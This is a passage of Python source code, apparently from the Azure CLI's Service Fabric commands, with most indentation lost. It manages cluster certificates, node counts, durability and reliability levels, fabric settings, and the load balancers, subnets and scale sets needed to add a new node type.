if admin_client_thumbprints or readonly_client_thumbprints:
if admin_client_thumbprints:
for t in admin_client_thumbprints:
_add_thumbprint(cluster, True, t)
if readonly_client_thumbprints:
for t in readonly_client_thumbprints:
_add_thumbprint(cluster, False, t)
if certificate_common_name:
_add_common_name(cluster, is_admin, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
cluster.client_certificate_common_names = _add_common_name(
cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
resource_group_name,
cluster_name,
thumbprints=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
client_certificate_common_names=None):
if thumbprints:
if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
            raise CLIError("--thumbprint can only be specified alone")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprints or client_certificate_common_names:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if client_certificate_common_names:
if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _remove_thumbprint(cluster, thumbprint):
remove = None
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_thumbprints.remove(remove)
return cluster.client_certificate_thumbprints
def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
        return cluster.client_certificate_common_names
if isinstance(thumbprints, list) is False:
_remove_thumbprint(cluster, thumbprints)
if isinstance(thumbprints, list) is True:
for t in thumbprints:
cluster.client_certificate_thumbprints = _remove_thumbprint(
cluster, t)
if certificate_common_name:
_remove_common_name(cluster, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
cluster.client_certificate_common_names = _remove_common_name(cluster,
common_name['certificateCommonName'],
common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to add certificate")
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
secret_url = result[1]
thumbprint = result[2]
compute_client = compute_client_factory(cli_ctx)
primary_node_type = [
n for n in cluster.node_types if n.is_primary is True][0]
vmss_name = primary_node_type.name
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, vmss_name)
fabric_ext = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
if ext.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
    if not fabric_ext:
raise CLIError("Failed to find service fabric extension")
import json
    secondary_setting = json.loads(
        '{{"thumbprint":"{0}","x509StoreName":"{1}"}}'.format(thumbprint, 'my'))
    fabric_ext[0].settings["certificateSecondary"] = secondary_setting
_add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url)
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate.thumbprint_secondary = thumbprint
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to remove certificate")
if cluster.certificate.thumbprint_secondary.lower() == thumbprint.lower():
cluster.certificate.thumbprint_secondary = None
else:
if cluster.certificate.thumbprint.lower() == thumbprint.lower():
cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
cluster.certificate.thumbprint_secondary = None
else:
raise CLIError(
"Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate = cluster.certificate
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_add = int(number_of_nodes_to_add)
if number_of_nodes_to_add <= 0:
raise CLIError("--number-of-nodes-to-add must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    if not node_types:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_remove = int(number_of_nodes_to_remove)
if number_of_nodes_to_remove <= 0:
raise CLIError("--number-of-nodes-to-remove must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    if not node_types:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
if node_type.durability_level.lower() == 'bronze':
raise CLIError("Can't delete node if durability level is bronze")
reliability_level = _get_target_instance(cluster.reliability_level)
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
if node_type.is_primary:
if vmss.sku.capacity < reliability_level:
raise CLIError("Can't delete node since current reliability level is {}".format(
reliability_level))
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(cmd, client, resource_group_name, cluster_name, node_type, durability_level):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    if not node_types:
raise CLIError("Failed to find the node type in the cluster")
compute_client = compute_client_factory(cli_ctx)
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type)
fabric_exts = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
if ext.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
    if not fabric_exts:
raise CLIError("Failed to find service fabric extension")
fabric_ext = fabric_exts[0]
if fabric_ext.settings['durabilityLevel'] == durability_level:
return cluster
fabric_ext.settings['durabilityLevel'] = durability_level
fabric_ext.settings['enableParallelJobs'] = True
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
node_type = node_types[0]
node_type.durability_level = durability_level
patch_request = ClusterUpdateParameters(node_types=node_types)
update_cluster_poll = client.update(
resource_group_name, cluster_name, patch_request)
def wait(ctx, poller):
return LongRunningOperation(ctx)(poller)
import threading
t1 = threading.Thread(target=wait, args=[cli_ctx, vmss_poll])
t2 = threading.Thread(target=wait, args=[cli_ctx, update_cluster_poll])
t1.start()
t2.start()
t1.join()
t2.join()
return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
resource_group_name,
cluster_name,
upgrade_mode,
version=None):
if upgrade_mode.lower() != 'manual' and upgrade_mode.lower() != 'automatic':
raise CLIError(
'--upgrade-mode can either be \'manual\' or \'automatic\'')
cluster = client.get(resource_group_name, cluster_name)
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
if upgrade_mode.lower() == 'manual':
if version is None:
raise CLIError(
'When \'--upgrade-mode\' set to \'manual\', --version must be given')
patch_request.cluster_code_version = version
patch_request.upgrade_mode = upgrade_mode
return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
value=None,
settings_section_description=None):
def _set(setting_dict, section, parameter, value):
if section not in setting_dict:
setting_dict[section] = {}
setting_dict[section][parameter] = value
return setting_dict
if settings_section_description and (section or parameter or value):
        raise CLIError(
            'Use either \'--settings-section-description\' or \'--section\', \'--parameter\' and \'--value\' to set the settings')
if section or parameter or value:
if section is None or parameter is None or value is None:
raise CLIError(
'\'--section\' , \'--parameter\' and \'--value\' can not be None')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting and 'value' in setting:
setting_dict = _set(setting_dict, setting['section'],
setting['parameter'], setting['value'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _set(setting_dict, section, parameter, value)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
settings_section_description=None):
def _remove(setting_dict, section, parameter):
if section not in setting_dict:
raise CLIError(
"Can't find the section {} in the settings".format(section))
if parameter not in setting_dict[section]:
raise CLIError(
"Can't find the parameter {} in the settings".format(parameter))
del setting_dict[section][parameter]
return setting_dict
if settings_section_description and (section or parameter):
        raise CLIError(
            'Use either \'--settings-section-description\' or \'--section\' and \'--parameter\' to remove the settings')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting:
setting_dict = _remove(setting_dict, setting['section'], setting['parameter'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _remove(setting_dict, section, parameter)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(cmd,
client,
resource_group_name,
cluster_name, reliability_level,
auto_add_node=False):
cli_ctx = cmd.cli_ctx
reliability_level = reliability_level.lower()
cluster = client.get(resource_group_name, cluster_name)
instance_now = _get_target_instance(cluster.reliability_level)
instance_target = _get_target_instance(reliability_level)
node_types = [n for n in cluster.node_types if n.is_primary]
    if not node_types:
        raise CLIError("Failed to find the primary node type in the cluster")
node_type = node_types[0]
compute_client = compute_client_factory(cli_ctx)
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
if instance_target == instance_now:
return cluster
if instance_target > instance_now:
if vmss.sku.capacity < instance_target:
if auto_add_node is not True:
                raise CLIError('Please use --auto_add_node to automatically increase the nodes, {} requires {} nodes, but currently there are {}'.
                               format(reliability_level, instance_target, vmss.sku.capacity))
vmss.sku.capacity = instance_target
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(
node_types=node_types, reliability_level=reliability_level)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(cmd,
client,
resource_group_name,
cluster_name,
node_type,
capacity,
vm_user_name,
vm_password,
vm_sku=DEFAULT_SKU,
vm_tier=DEFAULT_TIER,
durability_level=DEFAULT_DURABILITY_LEVEL):
cli_ctx = cmd.cli_ctx
if durability_level.lower() == 'gold':
        if vm_sku.lower() not in ('standard_d15_v2', 'standard_g5'):
            raise CLIError(
                'Only Standard_D15_v2 and Standard_G5 support Gold durability, please specify --vm-sku with one of these values')
cluster = client.get(resource_group_name, cluster_name)
    if any(n for n in cluster.node_types if n.name.lower() == node_type.lower()):
        raise CLIError("{} already exists in the cluster".format(node_type))
cluster.node_types.append(NodeTypeDescription(name=node_type,
client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
is_primary=False,
vm_instance_count=int(
capacity),
durability_level=durability_level,
application_ports=EndpointRangeDescription(
DEFAULT_APPLICATION_START_PORT, DEFAULT_APPLICATION_END_PORT),
ephemeral_ports=EndpointRangeDescription(DEFAULT_EPHEMERAL_START, DEFAULT_EPHEMERAL_END)))
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
poller = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cli_ctx)(poller)
subnet_name = "subnet_{}".format(1)
network_client = network_client_factory(cli_ctx)
location = _get_resource_group_name(cli_ctx, resource_group_name).location
virtual_network = list(
network_client.virtual_networks.list(resource_group_name))[0]
subnets = list(network_client.subnets.list(
resource_group_name, virtual_network.name))
address_prefix = None
index = None
for x in range(1, 255):
address_prefix = '10.0.{}.0/24'.format(x)
index = x
found = False
for s in subnets:
if address_prefix == s.address_prefix:
found = True
if subnet_name.lower() == s.name.lower():
subnet_name = "subnet_{}".format(x)
if found is False:
break
if address_prefix is None:
raise CLIError("Failed to generate the address prefix")
poller = network_client.subnets.create_or_update(resource_group_name,
virtual_network.name,
subnet_name,
Subnet(address_prefix=address_prefix))
subnet = LongRunningOperation(cli_ctx)(poller)
public_address_name = 'LBIP-{}-{}{}'.format(
cluster_name.lower(), node_type.lower(), index)
    dns_label = '{}-{}{}'.format(cluster_name.lower(),
                                 node_type.lower(), index)
lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
node_type.lower(), index)
poller = network_client.public_ip_addresses.create_or_update(resource_group_name,
public_address_name,
PublicIPAddress(public_ip_allocation_method='Dynamic',
location=location,
                                                                                 dns_settings=PublicIPAddressDnsSettings(dns_label)))
publicIp = LongRunningOperation(cli_ctx)(poller)
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cli_ctx)
new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
subscription_id, resource_group_name, lb_name)
backend_address_poll_name = "LoadBalancerBEAddressPool"
frontendip_configuration_name = "LoadBalancerIPConfig"
probe_name = "FabricGatewayProbe"
probe_http_name = "FabricHttpGatewayProbe"
inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
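    # The load balancer built below mirrors what the default cluster template
    # provisions for a node type: one frontend IP configuration, one backend
    # pool, TCP load-balancing rules plus probes for the client connection
    # (DEFAULT_TCP_PORT) and HTTP gateway (DEFAULT_HTTP_PORT) endpoints, and an
    # inbound NAT pool for remote access to the scale set instances.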
new_load_balancer = LoadBalancer(id=new_load_balancer_id,
location=location,
frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
public_ip_address=PublicIPAddress(id=publicIp.id))],
backend_address_pools=[BackendAddressPool(
name=backend_address_poll_name)],
load_balancing_rules=[LoadBalancingRule(name='LBRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_TCP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_TCP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_name))),
LoadBalancingRule(name='LBHttpRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_HTTP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_HTTP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_http_name)))],
probes=[Probe(protocol='tcp',
name=probe_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_TCP_PORT),
Probe(protocol='tcp',
name=probe_http_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_HTTP_PORT)],
inbound_nat_pools=[InboundNatPool(protocol='tcp',
name=inbound_nat_pools_name,
backend_port=DEFAULT_BACKEND_PORT,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
poller = network_client.load_balancers.create_or_update(
resource_group_name, lb_name, new_load_balancer)
LongRunningOperation(cli_ctx)(poller)
new_load_balancer = network_client.load_balancers.get(
resource_group_name, lb_name)
backend_address_pools = []
inbound_nat_pools = []
for p in new_load_balancer.backend_address_pools:
backend_address_pools.append(SubResource(id=p.id))
for p in new_load_balancer.inbound_nat_pools:
inbound_nat_pools.append(SubResource(id=p.id))
vm_network_profile = VirtualMachineScaleSetNetworkProfile(network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(name='NIC-{}-{}'.format(node_type.lower(), node_type.lower()),
primary=True,
ip_configurations=[VirtualMachineScaleSetIPConfiguration(name='Nic-{}'.format(node_type.lower()),
load_balancer_backend_address_pools=backend_address_pools,
load_balancer_inbound_nat_pools=inbound_nat_pools,
subnet=ApiEntityReference(id=subnet.id))])])
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(
resource_group_name))
vmss = [vm for vm in vmsses
if len([e for e in vm.virtual_machine_profile.extension_profile.extensions if e.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]) > 0]
vmss = vmss[0]
def create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location):
storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
name = ""
vhds = []
for n in storage_name:
if n.isalpha() or n.isdigit():
name += n
if len(name) >= 21:
break
for i in range(1, 6):
acc = create_storage_account(
                cli_ctx, resource_group_name.lower(), '{}{}'.format(name, i), location)
vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
return vhds
def create_storage_account(cli_ctx, resource_group_name, storage_name, location):
from azure.mgmt.storage.models import Sku, SkuName
storage_client = storage_client_factory(cli_ctx)
LongRunningOperation(cli_ctx)(storage_client.storage_accounts.create(resource_group_name,
storage_name,
StorageAccountCreateParameters(Sku(SkuName.standard_lrs),
'storage',
location)))
acc_prop = storage_client.storage_accounts.get_properties(
resource_group_name, storage_name)
acc_keys = storage_client.storage_accounts.list_keys(
resource_group_name, storage_name)
return acc_prop, acc_keys
publisher = 'MicrosoftWindowsServer'
offer = 'WindowsServer'
version = 'latest'
sku = os_dic[DEFAULT_OS]
if cluster.vm_image.lower() == 'linux':
publisher = 'Microsoft.Azure.ServiceFabric'
offer = 'UbuntuServer'
version = '6.0.11'
sku = os_dic['UbuntuServer1604']
storage_profile = VirtualMachineScaleSetStorageProfile(image_reference=ImageReference(publisher=publisher,
offer=offer,
sku=sku,
version=version),
os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
create_option='FromImage',
name='vmssosdisk',
vhd_containers=create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location)))
os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type,
admin_password=vm_password,
admin_username=vm_user_name,
secrets=vmss.virtual_machine_profile.os_profile.secrets)
diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
diagnostics_ext = None
fabric_ext = None
diagnostics_exts = [e for e in vmss.virtual_machine_profile.extension_profile.extensions if e.type.lower(
) == 'IaaSDiagnostics'.lower()]
if any(diagnostics_exts):
diagnostics_ext = diagnostics_exts[0]
diagnostics_account = diagnostics_ext.settings['StorageAccount']
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_account)
import json
json_data = json.loads(
'{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
json_data['storageAccountName'] = diagnostics_account
json_data['storageAccountKey'] = list_results.keys[0].value
json_data['storageAccountEndPoint'] = "https://core.windows.net/"
diagnostics_ext.protected_settings = json_data
fabric_exts = [e for e in vmss.virtual_machine_profile.extension_profile.extensions if e.type.lower(
) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if any(fabric_exts):
fabric_ext = fabric_exts[0]
if fabric_ext is None:
raise CLIError("No valid fabric extension found")
fabric_ext.settings['nodeTypeRef'] = node_type
fabric_ext.settings['durabilityLevel'] = durability_level
    if fabric_ext.settings.get('nicPrefixOverride'):
fabric_ext.settings['nicPrefixOverride'] = address_prefix
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_storage_name)
import json
json_data = json.loads(
'{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
fabric_ext.protected_settings = json_data
fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
extensions = [fabric_ext]
if diagnostics_ext:
extensions.append(diagnostics_ext)
vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
extensions=extensions)
virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
os_profile=os_profile,
storage_profile=storage_profile,
network_profile=vm_network_profile)
poller = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name,
node_type,
VirtualMachineScaleSet(location=location,
sku=ComputeSku(
vm_sku, vm_tier, capacity),
overprovision=False,
upgrade_policy=UpgradePolicy(
mode=UpgradeMode.automatic),
virtual_machine_profile=virtual_machine_scale_set_profile))
LongRunningOperation(cli_ctx)(poller)
return client.get(resource_group_name, cluster_name)
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
    if certificate_file:
        if certificate_subject_name:
            raise CLIError(
                '\'--certificate-subject-name\' is ignored if \'--certificate-file\' is present')
        if certificate_output_folder:
            raise CLIError(
                '\'--certificate-output-folder\' is ignored if \'--certificate-file\' is present')
    elif secret_identifier:
        if certificate_password:
            raise CLIError(
                '\'--certificate-password\' is ignored if \'--secret-identifier\' is present')
        if certificate_output_folder:
            raise CLIError(
                '\'--certificate-output-folder\' is ignored if \'--secret-identifier\' is present')
        if certificate_subject_name:
            raise CLIError(
                '\'--certificate-subject-name\' is ignored if \'--secret-identifier\' is present')
    elif not certificate_subject_name:
        raise CLIError(
            'One of \'--certificate-file\', \'--secret-identifier\' or \'--certificate-subject-name\' must be specified')
def _create_certificate(cli_ctx,
resource_group_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
_verify_cert_function_parameter(certificate_file, certificate_password,
vault_name, vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
output_file = None
rg = _get_resource_group_name(cli_ctx, resource_group_name)
location = rg.location
vault_id = None
secret_url = None
certificate_thumbprint = None
if secret_identifier is not None:
vault = _get_vault_from_secret_identifier(cli_ctx, secret_identifier)
vault_id = vault.id
certificate_thumbprint = _get_thumbprint_from_secret_identifier(
cli_ctx, vault, secret_identifier)
secret_url = secret_identifier
else:
if certificate_file is not None:
vault_name = _get_vault_name(resource_group_name, vault_name)
logger.info("Creating key vault")
vault = _create_keyvault(
cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(resource_group_name)
logger.info("Import certificate")
result = import_certificate(
cli_ctx, vault_uri, certificate_name, certificate_file, password=certificate_password)
vault_id = vault.id
secret_url = result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(result.x509_thumbprint))
else:
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if vault_name is None:
vault_name = resource_group_name
logger.info("Creating key vault")
vault = _create_keyvault(
cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
logger.info("Wait for key vault ready")
time.sleep(20)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(resource_group_name)
policy = _get_default_policy(certificate_subject_name)
logger.info("Creating self-signed certificate")
result = _create_self_signed_key_vault_certificate(
cli_ctx, vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
kv_result = result[0]
output_file = result[1]
vault_id = vault.id
secret_url = kv_result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(kv_result.x509_thumbprint))
return vault_id, secret_url, certificate_thumbprint, output_file
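# Summary of the three certificate inputs _create_certificate accepts (the
# values below are illustrative placeholders, not defaults):
#   1. --secret-identifier https://myvault.vault.azure.net/secrets/mycert/<version>
#      reuses an existing Key Vault secret.
#   2. --certificate-file ./mycert.pfx [--certificate-password ...]
#      imports the file into a key vault created (or reused) for the cluster.
#   3. --certificate-subject-name CN=mycluster.westus.cloudapp.azure.com
#      creates a self-signed certificate in a new key vault.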
# pylint: disable=inconsistent-return-statements
def _add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url):
compute_client = compute_client_factory(cli_ctx)
secrets = [
s for s in vmss.virtual_machine_profile.os_profile.secrets if s.source_vault.id == vault_id]
    if secrets:
        if secrets[0].vault_certificates is not None:
            certs = [
                c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
            if not certs:
                secrets[0].vault_certificates.append(
                    VaultCertificate(secret_url, 'my'))
            else:
                return
else:
secrets[0].vault_certificates = []
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
else:
vmss.virtual_machine_profile.os_profile.secrets = []
new_vault_certificates = []
new_vault_certificates.append(VaultCertificate(secret_url, 'my'))
vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(SubResource(vault_id),
new_vault_certificates))
poller = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
return LongRunningOperation(cli_ctx)(poller)
def _add_cert_to_all_vmss(cli_ctx, resource_group_name, vault_id, secret_url):
threads = []
import threading
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(
resource_group_name))
if vmsses is not None:
for vmss in vmsses:
t = threading.Thread(target=_add_cert_to_vmss, args=[cli_ctx, vmss, resource_group_name, vault_id, secret_url])
t.start()
threads.append(t)
for t in threads:
t.join()
def _get_resource_group_name(cli_ctx, resource_group_name):
try:
        resource_client = resource_client_factory(cli_ctx).resource_groups
        return resource_client.get(resource_group_name)
    except Exception as ex:  # pylint: disable=broad-except
        error = getattr(ex, 'Azure Error', ex)
        if error == 'ResourceGroupNotFound':
            return None
        raise
def _create_resource_group_name(cli_ctx, rg_name, location, tags=None):
from azure.mgmt.resource.resources.models import ResourceGroup
client = resource_client_factory(cli_ctx).resource_groups
parameters = ResourceGroup(location=location, tags=tags)
client.create_or_update(rg_name, parameters)
# pylint: disable=inconsistent-return-statements
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
# pylint: disable=inconsistent-return-statements
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if size > 0 and size < 3:
return 'None'
if size >= 3 and size < 5:
return 'Bronze'
if size >= 5 and size < 7:
return 'Silver'
